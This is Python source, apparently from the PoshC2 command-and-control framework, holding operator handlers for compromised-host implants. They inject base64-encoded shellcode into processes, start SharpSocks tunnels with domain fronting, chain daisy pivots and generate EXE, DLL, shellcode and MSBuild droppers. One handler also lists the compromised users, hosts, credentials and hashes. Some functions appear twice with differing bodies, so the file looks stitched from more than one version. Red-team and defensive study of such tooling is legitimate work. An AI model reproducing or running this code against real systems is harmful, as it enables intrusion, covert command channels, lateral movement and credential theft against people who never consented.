def do_migrate(user, command, randomuri): params = re.compile("migrate", re.IGNORECASE) params = params.sub("", command) implant = get_implantdetails(randomuri) implant_arch = implant[10] implant_comms = implant[15] if implant_arch == "AMD64": arch = "64" else: arch = "86" if implant_comms == "PS": path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory, arch) shellcodefile = load_file(path) elif "Daisy" in implant_comms: daisyname = input("Name required: ") path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % ( PoshProjectDirectory, daisyname, arch) shellcodefile = load_file(path) elif "Proxy" in implant_comms: path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % ( PoshProjectDirectory, arch) shellcodefile = load_file(path) check_module_loaded("Inject-Shellcode.ps1", randomuri, user) new_task( "$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri) new_task( "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
def do_sharpsocks(user, command, randomuri): check_module_loaded("SharpSocks.ps1", randomuri, user) import string from random import choice allchar = string.ascii_letters channel = "".join(choice(allchar) for x in range(25)) sharpkey = gen_key().decode("utf-8") sharpurls = get_sharpurls() sharpurl = select_item("PayloadCommsHost", "C2Server") sharpport = select_item("PayloadCommsPort", "C2Server") dfheader = select_item("DomainFrontHeader", "C2Server") implant = get_implantdetails(randomuri) pivot = implant[15] if pivot != "PS": sharpurl = input("Enter the URL for SharpSocks: ") if (sharpport != 80 and sharpport != 443): if (sharpurl.count("/") >= 3): pat = re.compile(r"(?<!/)/(?!/)") sharpurl = pat.sub(":%s/" % sharpport, str, 1) else: sharpurl = ("%s:%s" % (sharpurl, sharpport)) print(PoshInstallDirectory + "resources/SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN) ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ") if ri.lower() == "n": print("") if (ri == "") or (ri.lower() == "y"): taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls) if dfheader: taskcmd += " -DomainFrontURL %s" % dfheader new_task(taskcmd, user, randomuri) update_label("SharpSocks", randomuri)
def do_kill_implant(user, command, randomuri): impid = get_implantdetails(randomuri) ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0]) if ri.lower() == "n": print("Implant not terminated") if ri == "": new_task("exit", user, randomuri) kill_implant(randomuri) if ri.lower() == "y": new_task("exit", user, randomuri) kill_implant(randomuri)
def do_tasks(user, command): alltasks = "" tasks = get_newtasks_all() if tasks is None: print_good("No tasks queued!\r\n") else: for task in tasks: imname = get_implantdetails(task[1]) alltasks += "[%s] : %s | %s\r\n" % (imname[0], "%s\\%s" % (imname[11], imname[2]), task[2]) print_good("Queued tasks:\r\n\r\n%s" % alltasks) input("Press Enter to continue...") clear()
def do_opsec(user, command): implants = get_implants_all() comtasks = get_tasks() hosts = "" uploads = "" urls = "" users = "" for i in implants: if i[3] not in hosts: hosts += "%s \n" % i[3] if i[9] not in urls: urls += "%s \n" % i[9] for t in comtasks: hostname = get_implantdetails(t[1]) command = t[2].lower() output = t[3].lower() if hostname[2] not in users: users += "%s\\%s @ %s\n" % (hostname[11], hostname[2], hostname[3]) if "invoke-pbind" in command and "connected" in output: tg = re.search("(?<=-target )\\S*", str(command)) if tg[0] not in hosts: hosts += "%s \n" % tg[0] if "uploading file" in command: uploadedfile = command uploadedfile = uploadedfile.partition( "uploading file: ")[2].strip() filehash = uploadedfile.partition(" with md5sum:")[2].strip() uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip() uploadedfile = uploadedfile.strip('"') uploads += "%s\t%s\t%s\n" % (hostname[3], filehash, uploadedfile) if "installing persistence" in output: line = command.replace('\n', '') line = line.replace('\r', '') filenameuploaded = line.rstrip().split(":", 1)[1] uploads += "%s %s \n" % (hostname[3], filenameuploaded) if "written scf file" in output: uploads += "%s %s \n" % (hostname[3], output) creds, hashes = parse_creds(get_creds()) print_good( "\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (users, hosts, urls, uploads, creds, hashes)) input("Press Enter to continue...") clear()
def do_migrate(user, command, randomuri): params = re.compile("migrate", re.IGNORECASE) params = params.sub("", command) implant = get_implantdetails(randomuri) implant_arch = implant[10] implant_comms = implant[15] if implant_arch == "AMD64": arch = "64" else: arch = "86" if implant_comms == "C#": path = "%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch) shellcodefile = load_file(path) elif "Daisy" in implant_comms: daisyname = input("Name required: ") path = "%s%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, daisyname, arch) shellcodefile = load_file(path) elif "Proxy" in implant_comms: path = "%sProxySharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch) shellcodefile = load_file(path) new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
def do_startdaisy(user, command, randomuri): check_module_loaded("daisy.dll", randomuri, user) elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END) domain_front = "" proxy_user = "" proxy_pass = "" proxy_url = "" if elevated.lower() == "n": cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END) if cont.lower() == "n" or cont == "": return bind_ip = "localhost" else: bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END) bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END) firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END) if firstdaisy.lower() == "y" or firstdaisy == "": upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {PayloadCommsHost}): " + Colours.END) if DomainFrontHeader: domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {DomainFrontHeader}): " + Colours.END) else: domain_front = input(Colours.GREEN + f"Domain front header (leave blank for configured value of no header): " + Colours.END) proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END) proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END) proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END) if not upstream_url: upstream_url = PayloadCommsHost if not domain_front: domain_front = DomainFrontHeader else: upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END) upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END) upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}" domain_front = upstream_daisy_host urls = get_allurls().replace(" ", "") useragent = UserAgent command = f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" \"{upstream_url}\" \"{domain_front}\" \"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}" new_task(command, user, randomuri) update_label("DaisyHost", randomuri) createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ") if createpayloads.lower() == "y" or createpayloads == "": name = input(Colours.GREEN + "Enter a payload name: " + Colours.END) daisyhost = get_implantdetails(randomuri) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], f"http://{bind_ip}", "", f"{bind_port}", "", "", "", "", proxynone, C2[17], C2[18], C2[19], "%s?d" % get_newimplanturl(), PayloadsDirectory) newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost[11], daisyhost[3])) newPayload.CreateRaw(name) newPayload.CreateDlls(name) newPayload.CreateShellcode(name) newPayload.CreateEXE(name) newPayload.CreateMsbuild(name) newPayload.CreateCS(name) new_urldetails(name, C2[1], C2[3], f"Daisy: {name}", upstream_url, daisyhost[0], "") print_good("Created new %s daisy payloads" % name)
def do_modulesloaded(user, command, randomuri): implant_details = get_implantdetails(randomuri) print(implant_details[14]) new_task("listmodules", user, randomuri)
def do_modulesloaded(user, command, randomuri): ml = get_implantdetails(randomuri) print(ml[14])
def do_get_pid(user, command, randomuri): implant_details = get_implantdetails(randomuri) print(implant_details[8])